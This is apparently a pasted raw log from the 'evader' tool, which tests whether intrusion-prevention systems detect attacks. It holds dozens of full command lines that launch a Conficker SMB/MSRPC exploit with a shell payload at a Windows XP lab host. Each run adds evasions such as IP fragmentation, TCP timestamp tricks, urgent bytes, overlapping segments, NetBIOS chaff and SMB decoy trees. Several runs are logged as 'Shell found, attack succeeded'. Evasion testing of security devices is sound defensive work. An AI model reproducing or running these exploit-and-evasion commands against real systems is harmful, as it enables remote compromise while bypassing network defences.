- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - TCP packets are segmented to contain at most 1 bytes of payload.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - IPv4 fragments with at most 24 bytes per fragment
- Info: NetBIOS connection 10.62.90.116:65461 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ............
- 28231 runs averaging 1.76 runs / second ; progress: 16001/43200..2015-11-29 18:52:34 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38050 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=xGZ1/aGMnEk --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"1448" --evasion=[netbios_connect,msrpc_req]netbios_chaff,"50%","msrpc_req" --evasion=[netbios_connect,end]tcp_paws,"75%","4","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed xGZ1/aGMnEn
- The following evasions are applied from stage netbios_connect to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has shuffled original payload
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - IPv4 fragments with at most 1448 bytes per fragment
- Info: NetBIOS connection 10.62.90.116:38050 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 28236 runs averaging 1.76 runs / second ; progress: 16006/43200...
- 28239 runs averaging 1.76 runs / second ; progress: 16011/43200..........
- 28249 runs averaging 1.76 runs / second ; progress: 16016/43200.........
- 28258 runs averaging 1.76 runs / second ; progress: 16021/43200................
- 28274 runs averaging 1.76 runs / second ; progress: 16026/43200................
- 28290 runs averaging 1.76 runs / second ; progress: 16031/43200........
- 28298 runs averaging 1.76 runs / second ; progress: 16036/43200....Pid 9020 timed out - killed
- 2015-11-29 18:53:10 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33477 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=CHrh0o4+Eik --evasion=[start,smb_openpipe]tcp_paws,"75%","10","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed CHrh0o4+Eik
- The following evasions are applied from stage start to smb_openpipe:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.111:33477 -> 10.35.1.207:445
- Terminated
- .....
- 28308 runs averaging 1.76 runs / second ; progress: 16041/43200.........
- 28317 runs averaging 1.76 runs / second ; progress: 16046/43200.........
- 28326 runs averaging 1.76 runs / second ; progress: 16052/43200..........
- 28336 runs averaging 1.76 runs / second ; progress: 16057/43200......
- 28342 runs averaging 1.76 runs / second ; progress: 16062/43200.....
- 28347 runs averaging 1.76 runs / second ; progress: 16067/43200.........
- 28356 runs averaging 1.76 runs / second ; progress: 16072/43200...2015-11-29 18:53:44 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63149 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Jl4yonimAlo --evasion=[smb_connect,msrpc_req]smb_decoytrees,"2","1","2","random_msrpcreq" --evasion=[start,end]tcp_paws,"75%","8","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed Jl4yonimAlo
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 2 SMB trees are opened and 1 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.116:63149 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 28368 runs averaging 1.76 runs / second ; progress: 16077/432002015-11-29 18:53:47 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43826 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=PC0BS/oNbts --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","8","alpharandomized" --evasion=[msrpc_bind,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed PC0BS/oNbts
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.116:43826 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ...........
- 28380 runs averaging 1.76 runs / second ; progress: 16082/43200..........
- 28390 runs averaging 1.76 runs / second ; progress: 16087/43200............
- 28402 runs averaging 1.77 runs / second ; progress: 16092/43200.......Pid 10253 timed out - killed
- 2015-11-29 18:54:05 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15281 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=oEsZ7fgDE68 --evasion=[start,smb_openpipe]ipv4_frag,"1472" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed oEsZ7fgDE6+
- The following evasions are applied from stage start to smb_openpipe:
- - IPv4 fragments with at most 1472 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 50% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.113:15281 -> 10.35.1.207:445
- Terminated
- .......
- 28417 runs averaging 1.77 runs / second ; progress: 16097/43200....
- 28421 runs averaging 1.77 runs / second ; progress: 16102/43200......
- 28427 runs averaging 1.76 runs / second ; progress: 16107/43200....
- 28431 runs averaging 1.76 runs / second ; progress: 16112/43200....
- 28435 runs averaging 1.76 runs / second ; progress: 16117/43200.
- 28436 runs averaging 1.76 runs / second ; progress: 16122/43200.....
- 28441 runs averaging 1.76 runs / second ; progress: 16127/43200.......
- 28448 runs averaging 1.76 runs / second ; progress: 16132/43200.....
- 28453 runs averaging 1.76 runs / second ; progress: 16137/43200......
- 28459 runs averaging 1.76 runs / second ; progress: 16142/43200......
- 28465 runs averaging 1.76 runs / second ; progress: 16147/43200.............
- 28478 runs averaging 1.76 runs / second ; progress: 16152/43200..........
- 28488 runs averaging 1.76 runs / second ; progress: 16157/43200..........Pid 11292 timed out - killed
- 2015-11-29 18:55:12 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37589 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=/44Lb9fhL+E --evasion=[smb_connect,smb_opentree]smb_writeandxpad,"7","random_alphanum" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed /44Lb9fhL+H
- The following evasions are applied from stage smb_connect to smb_opentree:
- - 7 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.117:37589 -> 10.35.1.207:445
- Terminated
- 28499 runs averaging 1.76 runs / second ; progress: 16162/43200.....Pid 11315 timed out - killed
- 2015-11-29 18:55:14 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23858 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=TUOmd39n/3I --evasion=[smb_opentree,msrpc_bind]netbios_chaff,"13","empty_keepalive|small_unspec|http_get|msrpc_req|broken_length" --evasion=[smb_opentree,end]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed TUOmd39n/3J
- The following evasions are applied from stage smb_opentree to end:
- - Add a random urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.112:23858 -> 10.35.1.207:445
- Terminated
- ........2015-11-29 18:55:17 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34627 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=Fyro1IIugKo --evasion=[smb_openpipe,msrpc_bind]ipv4_opt,"2","inc","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"25%","10","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed Fyro1IIugKo
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphabetic bytes as payload
- Info: NetBIOS connection 10.62.90.114:34627 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 28517 runs averaging 1.76 runs / second ; progress: 16167/43200................
- 28533 runs averaging 1.76 runs / second ; progress: 16172/43200........
- 28541 runs averaging 1.76 runs / second ; progress: 16177/43200...
- 28544 runs averaging 1.76 runs / second ; progress: 16182/43200...........
- 28555 runs averaging 1.76 runs / second ; progress: 16187/43200...................
- 28574 runs averaging 1.76 runs / second ; progress: 16192/43200.............
- 28587 runs averaging 1.76 runs / second ; progress: 16197/43200....
- 28591 runs averaging 1.76 runs / second ; progress: 16202/43200...........
- 28602 runs averaging 1.76 runs / second ; progress: 16207/43200......
- 28608 runs averaging 1.76 runs / second ; progress: 16212/43200.......Pid 11803 timed out - killed
- 2015-11-29 18:56:06 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22964 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=LeqaqL5XwYM --evasion=[smb_connect,msrpc_req]tcp_segvar,"1","65535" --evasion=[smb_openpipe,end]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed LeqaqL5XwYM
- The following evasions are applied from stage smb_connect to msrpc_req:
- - TCP packets are segmented to contain between 1 and 65535 bytes of payload.
- The following evasions are applied from stage smb_openpipe to end:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.115:22964 -> 10.35.1.207:445
- Terminated
- ......
- 28622 runs averaging 1.76 runs / second ; progress: 16217/43200.2015-11-29 18:56:09 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60975 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=ilnMy/qVBQY --evasion=[smb_opentree,end]smb_decoytrees,"5","3","7","random_msrpcreq" --evasion=[smb_openpipe,msrpc_req]tcp_overlap,"1245","new","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed ilnMy/qVBQa
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP segments are set to overlap by 1245 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.115:60975 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ...........
- 28635 runs averaging 1.77 runs / second ; progress: 16222/43200..2015-11-29 18:56:14 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31595 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=bktDO+ILREo --evasion=[netbios_connect,end]ipv4_frag,"40" --evasion=[smb_connect,end]smb_decoytrees,"3","1","3","random_msrpcreq" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"2","4","1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed bktDO+ILREp
- The following evasions are applied from stage netbios_connect to end:
- - IPv4 fragments with at most 40 bytes per fragment
- The following evasions are applied from stage smb_connect to end:
- - Before normal SMB writes, 3 SMB trees are opened and 1 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before normal SMB writes, 2 SMB trees are opened and 4 writes are performed to them. The write payload is 1 random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.115:31595 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........Interrupt registered, soft shutdown
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement